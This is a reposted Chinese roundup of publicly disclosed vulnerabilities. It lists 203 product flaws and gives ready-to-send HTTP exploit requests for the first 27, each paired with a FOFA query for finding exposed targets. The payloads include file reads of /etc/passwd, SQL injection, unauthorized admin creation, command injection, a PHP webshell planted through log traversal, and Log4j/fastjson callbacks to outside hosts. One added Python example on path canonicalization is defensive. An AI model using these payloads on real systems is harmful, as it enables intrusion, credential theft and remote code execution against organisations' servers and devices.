Collection of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06 (repost)

Posted 2024-6-5 14:31:29
Source: 道一安全, 2024-06-05 07:41, Beijing. The article below originally appeared on the 网络安全新视界 public account; author: 网络安全新视界.

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of the attacks seen in offensive/defensive engagements. This article is meant to help defenders; blue-team members can use its contents as a checklist for risk triage.

Vulnerability sources: The article covers 203 POCs for high-severity vulnerabilities disclosed in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites on the Internet and compiled for publication by the 网络安全新视界 team.

Security patches: All of the vulnerabilities are already public. For patches or remediation guidance, contact the product vendor.

Content: Because of length limits, a few POCs that were too long have their payload replaced by the word PAYLOAD; search for the complete POC yourself if you need it.

Legal: If any of the content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account's back end and the relevant content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list": this article is the complete version. When using it, press F12 and search for the keyword you need.

Bookmark this article if you need it, or follow the public account (网络安全新视界).

Table of contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
14. jshERP (华夏ERP) sensitive information disclosure
15. jshERP getAllList information disclosure
16. Hongfan HFOffice 医微云 SQL injection
17. Dahua (大华) DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform Log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8 Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPtech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro (百卓) Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom/broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin (奇安信) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 Groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 back end sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. Kirisun (福建科立讯) communications command and dispatch platform down_file.php SQL injection
138. Kirisun communications command and dispatch platform pwd_update.php SQL injection
139. Kirisun communications command and dispatch platform editemedia.php SQL injection
140. Kirisun communications command and dispatch platform get_extension_yl.php SQL injection
141. Kirisun communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire and rescue dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking payment system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information release system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益价值管理系统 DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. Volans (飞鱼星) Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. 微擎 (WeEngine) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 hash of the password you want the new account to have.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"

Log in to the admin interface with the default account admin first, then send the following request.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<sysauth cookie obtained from the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"

Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value from the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST request. The language parameter traverses into application/logs, and the login value plants a PHP stub there that runs the base64-decoded contents of a request header.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the following request to the lab target to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command; it decodes to echo ---------;id 2>&1;echo ---------;
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. jshERP (华夏ERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. jshERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

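Entries 2, 14 and 15 are the same class of bug seen from two sides: an access check (a "starts with /static/" test, or an exact match against the protected getAllList route) is run on the path as the client sent it, while the component that later serves the file or dispatches the request resolves .. and strips servlet-style ;param suffixes first. So /static/../../etc/passwd passes the prefix test and escapes the static directory, and getAllList;.ico or a.ico/../getAllList never equals the route string the check is looking for yet still reaches the handler. The following is an added example, not code from Casdoor, jshERP or the original article: a naive check of that kind beside a canonicalizing one. The protected route and the static prefix are taken from the two POCs above; the checks themselves are an assumption about the bug class, not the real code.

```python
from urllib.parse import unquote

# From the POCs above: the route that leaks users (entries 14/15) and the
# unauthenticated static prefix abused for traversal (entry 2).
PROTECTED_ROUTES = {"/jshERP-boot/user/getAllList"}
STATIC_ROOT = "/static/"


def naive_requires_auth(raw_path):
    """Assumed weak check: compare the path exactly as the client sent it.
    'getAllList;.ico' and 'a.ico/../getAllList' are not equal to the route string."""
    return raw_path.split("?", 1)[0] in PROTECTED_ROUTES


def naive_is_static(raw_path):
    """Assumed weak check: prefix test on the raw path; '/static/../../etc/passwd' passes."""
    return raw_path.startswith(STATIC_ROOT)


def canonicalize(raw_path):
    """Resolve the path the way the file system / dispatcher will see it:
    percent-decode until stable (entry 9 shows double encoding in the wild),
    drop ';param' from every segment (servlet path parameters), then resolve
    '.' and '..'. Raises if '..' would climb above the web root."""
    path = raw_path.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if not out:
                raise ValueError("path escapes the web root: %r" % raw_path)
            out.pop()
        else:
            out.append(seg)
    return "/" + "/".join(out)


def hardened_requires_auth(raw_path):
    """Match on the canonical path; a path that escapes the root is denied (fail closed)."""
    try:
        return canonicalize(raw_path) in PROTECTED_ROUTES
    except ValueError:
        return True


def hardened_is_static(raw_path):
    """Serve a static file only if the canonical path is still under STATIC_ROOT."""
    try:
        return canonicalize(raw_path).startswith(STATIC_ROOT)
    except ValueError:
        return False


if __name__ == "__main__":
    for p in ("/static/../../../../etc/passwd",
              "/jshERP-boot/user/getAllList;.ico",
              "/jshERP-boot/user/a.ico/../getAllList"):
        try:
            canon = canonicalize(p)
        except ValueError as e:
            canon = "DENY (%s)" % e
        print(p, "->", canon,
              "| naive auth:", naive_requires_auth(p), "hardened auth:", hardened_requires_auth(p),
              "| naive static:", naive_is_static(p), "hardened static:", hardened_is_static(p))
```

The point for defenders is the order of operations: canonicalize once, at the edge, and make every later check (authentication, allow-lists, file serving) consume only the canonical form. A WAF or reverse proxy that matches on the raw path has the same blind spot as the naive functions above.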
16. Hongfan HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC injects a function call that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
        }""
}

22. Dahua ICC intelligent IoT integrated management platform Log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog


26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
